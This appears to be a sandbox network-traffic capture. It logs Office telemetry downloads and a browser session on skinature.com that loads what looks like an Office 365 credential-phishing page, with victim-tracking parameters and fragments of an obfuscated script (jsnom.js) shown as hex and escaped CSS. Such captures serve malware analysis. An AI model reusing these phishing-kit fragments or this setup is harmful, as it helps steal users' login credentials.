                                                                    Date: Mon, 28 Oct 2024 13:03:17 GMT
                                                                    Server: Apache
                                                                    Upgrade: h2,h2c
                                                                    Connection: Upgrade, close
                                                                    Vary: Accept-Encoding
                                                                    host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                    Transfer-Encoding: chunked
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    2024-10-28 13:03:18 UTC378INData Raw: 31 36 65 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 69 64 3d 27 68 74 6d 6c 27 20 73 74 69 3d 27 56 6c 5a 4f 52 6c 56 71 52 54 4a 4e 56 45 46 35 54 55 52 4a 4d 46 5a 55 52 58 68 4e 56 45 46 34 54 6d 70 52 4d 77 3d 3d 27 20 76 69 63 3d 27 27 20 6c 61 6e 67 3d 27 65 6e 27 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 6f 63 6b 65 74 2e 69 6f 2f 34 2e 37 2e 35 2f 73 6f 63 6b 65 74 2e 69 6f 2e 6d 69 6e 2e 6a 73 27 20 69 6e 74 65 67 72 69 74 79 3d 27 73 68 61 33 38 34 2d 32 68 75 61 5a 76 4f 52 39 69 44 7a 48 71 73 6c 71 77 70 52 38 37 69 73 45 6d 72 66 78 71 79 57 4f 46 37 68 72 37 42 59 36 4b 47 30 2b 68 56 4b 4c 6f 45 58 4d 50 55 4a 77 33 79 6e 57 75 68
                                                                    Data Ascii: 16e<!DOCTYPE html><html id='html' sti='VlZORlVqRTJNVEF5TURJMFZURXhNVEF4TmpRMw==' vic='' lang='en'><head> <script src='https://cdn.socket.io/4.7.5/socket.io.min.js' integrity='sha384-2huaZvOR9iDzHqslqwpR87isEmrfxqyWOF7hr7BY6KG0+hVKLoEXMPUJw3ynWuh


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    8192.168.2.44975313.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:17 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:18 UTC561INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:18 GMT
                                                                    Content-Type: text/plain
                                                                    Content-Length: 218853
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Cache-Control: public
                                                                    Last-Modified: Sun, 27 Oct 2024 10:35:44 GMT
                                                                    ETag: "0x8DCF6731CF80310"
                                                                    x-ms-request-id: 89d6c6b8-201e-0033-2798-28b167000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130318Z-16849878b78qf2gleqhwczd21s0000000590000000009kp5
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache-Info: L1_T2
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:18 UTC15823INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                    Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                    2024-10-28 13:03:18 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                    Data Ascii: <S T="1" F="0" /> </L> <R> <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L>
                                                                    2024-10-28 13:03:18 UTC16384INData Raw: 3c 53 20 54 3d 22 33 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 20 20 3c 53 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 53 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 38 32 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d
                                                                    Data Ascii: <S T="3" /> </T> <ST> <S T="1" /> </ST></R><$!#>10820v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-
                                                                    2024-10-28 13:03:18 UTC16384INData Raw: 6e 74 73 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 36 34 22 20 49 3d 22 38 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 45 76 65 6e 74 73 5f 41 76 67 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 41 76 65 72 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a
                                                                    Data Ascii: nts" /> </C> <C T="U64" I="8" O="false" N="Events_Avg"> <S T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" />
                                                                    2024-10-28 13:03:18 UTC16384INData Raw: 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20
                                                                    Data Ascii: </S> <C T="U32" I="0" O="false" N="Count_CreateCard_ValidPersona_False"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32"
                                                                    2024-10-28 13:03:18 UTC16384INData Raw: 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 39 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20
                                                                    Data Ascii: _Count"> <C> <S T="31" /> </C> </C> <C T="U32" I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S
                                                                    2024-10-28 13:03:18 UTC16384INData Raw: 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22
                                                                    Data Ascii: <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3"
                                                                    2024-10-28 13:03:18 UTC16384INData Raw: 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65
                                                                    Data Ascii: </L> <R> <V V="0" T="I32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false
                                                                    2024-10-28 13:03:18 UTC16384INData Raw: 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                    Data Ascii: T="B" /> </R> </O> </F> <F T="6"> <O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" />
                                                                    2024-10-28 13:03:18 UTC16384INData Raw: 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54
                                                                    Data Ascii: O> </F> <F T="6"> <O T="EQ"> <L> <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    9192.168.2.44975450.87.179.2404431704C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:18 UTC602OUTGET /o/jsnom.js HTTP/1.1
                                                                    Host: skinature.com
                                                                    Connection: keep-alive
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Accept: */*
                                                                    Sec-Fetch-Site: same-origin
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: script
                                                                    Referer: https://skinature.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPVdEVkZhekE9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123N
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-10-28 13:03:18 UTC313INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:18 GMT
                                                                    Server: Apache
                                                                    Upgrade: h2,h2c
                                                                    Connection: Upgrade, close
                                                                    Last-Modified: Thu, 24 Oct 2024 17:05:19 GMT
                                                                    Accept-Ranges: bytes
                                                                    Content-Length: 100217
                                                                    Vary: Accept-Encoding
                                                                    host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                    Content-Type: application/javascript
                                                                    2024-10-28 13:03:18 UTC7879INData Raw: 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 66 61 65 28 5f 30 78 33 34 62 61 31 39 2c 20 5f 30 78 35 39 38 62 31 38 29 20 7b 20 63 6f 6e 73 74 20 5f 30 78 35 39 65 62 30 35 20 3d 20 5f 30 78 35 39 65 62 28 29 3b 20 72 65 74 75 72 6e 20 5f 30 78 31 66 61 65 20 3d 20 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 66 61 65 35 39 2c 20 5f 30 78 33 39 31 66 64 35 29 20 7b 20 5f 30 78 31 66 61 65 35 39 20 3d 20 5f 30 78 31 66 61 65 35 39 20 2d 20 30 78 65 61 3b 20 6c 65 74 20 5f 30 78 63 62 63 31 36 39 20 3d 20 5f 30 78 35 39 65 62 30 35 5b 5f 30 78 31 66 61 65 35 39 5d 3b 20 72 65 74 75 72 6e 20 5f 30 78 63 62 63 31 36 39 3b 20 7d 2c 20 5f 30 78 31 66 61 65 28 5f 30 78 33 34 62 61 31 39 2c 20 5f 30 78 35 39 38 62 31 38 29 3b 20 7d 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33
                                                                    Data Ascii: function _0x1fae(_0x34ba19, _0x598b18) { const _0x59eb05 = _0x59eb(); return _0x1fae = function(_0x1fae59, _0x391fd5) { _0x1fae59 = _0x1fae59 - 0xea; let _0xcbc169 = _0x59eb05[_0x1fae59]; return _0xcbc169; }, _0x1fae(_0x34ba19, _0x598b18); }(function(_0x3
                                                                    2024-10-28 13:03:18 UTC8000INData Raw: 32 30 5c 78 32 30 5c 78 32 30 70 6f 73 69 74 69 6f 6e 3a 5c 78 32 30 61 62 73 6f 6c 75 74 65 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 5c 78 32 30 61 75 74 6f 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 5c 78 32 30 61 75 74 6f 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 68 65 69 67 68 74 3a 5c 78 32 30 61 75 74 6f 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 74 6f 70 3a 5c 78 32 30 30 25 3b 5c 78
                                                                    Data Ascii: 20\x20\x20position:\x20absolute;\x0a\x20\x20\x20\x20\x20\x20\x20\x20margin-left:\x20auto;\x0a\x20\x20\x20\x20\x20\x20\x20\x20margin-right:\x20auto;\x0a\x20\x20\x20\x20\x20\x20\x20\x20height:\x20auto;\x0a\x20\x20\x20\x20\x20\x20\x20\x20margin-top:\x200%;\x
                                                                    2024-10-28 13:03:18 UTC8000INData Raw: 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 5c 78 32 30 6e 6f 72 6d 61 6c 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 77 6f 72 64 2d 73 70 61 63 69 6e 67 3a 5c 78 32 30 6e 6f 72 6d 61 6c 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 61 70 70 65 61 72 61 6e 63 65 3a 5c 78 32 30 74 65 78 74 66 69 65 6c 64 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 5c 78 32 30 2d 69 6e 74 65 72 6e 61 6c 2d 6c 69 67 68 74 2d 64 61 72 6b 28 72 67 62 28 32 35 35 2c 5c 78 32 30
                                                                    Data Ascii: 20\x20\x20\x20\x20letter-spacing:\x20normal;\x0a\x20\x20\x20\x20\x20\x20\x20\x20word-spacing:\x20normal;\x0a\x20\x20\x20\x20\x20\x20\x20\x20appearance:\x20textfield;\x0a\x20\x20\x20\x20\x20\x20\x20\x20background-color:\x20-internal-light-dark(rgb(255,\x20
                                                                    2024-10-28 13:03:18 UTC8000INData Raw: 64 65 42 61 72 5c 78 32 30 7b 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 73 68 72 69 6e 6b 6d 65 6e 75 31 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 63 75 72 73 6f 72 3a 5c 78 32 30 70 6f 69 6e 74 65 72 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 6e 65 77 31 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 63 75 72 73 6f 72 3a 5c 78 32 30 70 6f 69 6e 74 65 72 3b 5c 78 30 61 5c 78
                                                                    Data Ascii: deBar\x20{}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.shrinkmenu1\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20cursor:\x20pointer;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.new1\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20cursor:\x20pointer;\x0a\x
                                                                    2024-10-28 13:03:18 UTC8000INData Raw: 6e 67 2d 62 65 66 6f 72 65 5c 78 32 30 32 73 5c 78 32 30 69 6e 66 69 6e 69 74 65 5c 78 32 30 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 61 6e 69 6d 61 74 69 6f 6e 3a 5c 78 32 30 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 2d 62 65 66 6f 72 65 5c 78 32 30 32 73 5c 78 32 30 69 6e 66 69 6e 69 74 65 5c 78 32 30 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 3a 3a 61 66 74 65 72 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32
                                                                    Data Ascii: ng-before\x202s\x20infinite\x20ease-in-out;\x0a\x20\x20\x20\x20\x20\x20\x20\x20animation:\x20dot-floating-before\x202s\x20infinite\x20ease-in-out;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.dot-floating::after\x20{\x0a\x20\x20\x20\x20\x2
                                                                    2024-10-28 13:03:18 UTC8000INData Raw: 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 63 68 65 63 6b 62 6f 78 2d 77 72 61 70 70 65 72 2d 34 33 5c 78 32 30 69 6e 70 75 74 5b 74 79 70 65 3d 5c 78 32 32 63 68 65 63 6b 62 6f 78 5c 78 32 32 5d 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 69 73 70 6c 61 79 3a 5c 78 32 30 6e 6f 6e 65 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 76 69 73 69 62 69 6c 69 74 79 3a 5c 78 32 30 68 69 64 64 65 6e 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78
                                                                    Data Ascii: \x20\x20\x20\x0a\x20\x20\x20\x20.checkbox-wrapper-43\x20input[type=\x22checkbox\x22]\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20display:\x20none;\x0a\x20\x20\x20\x20\x20\x20\x20\x20visibility:\x20hidden;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x
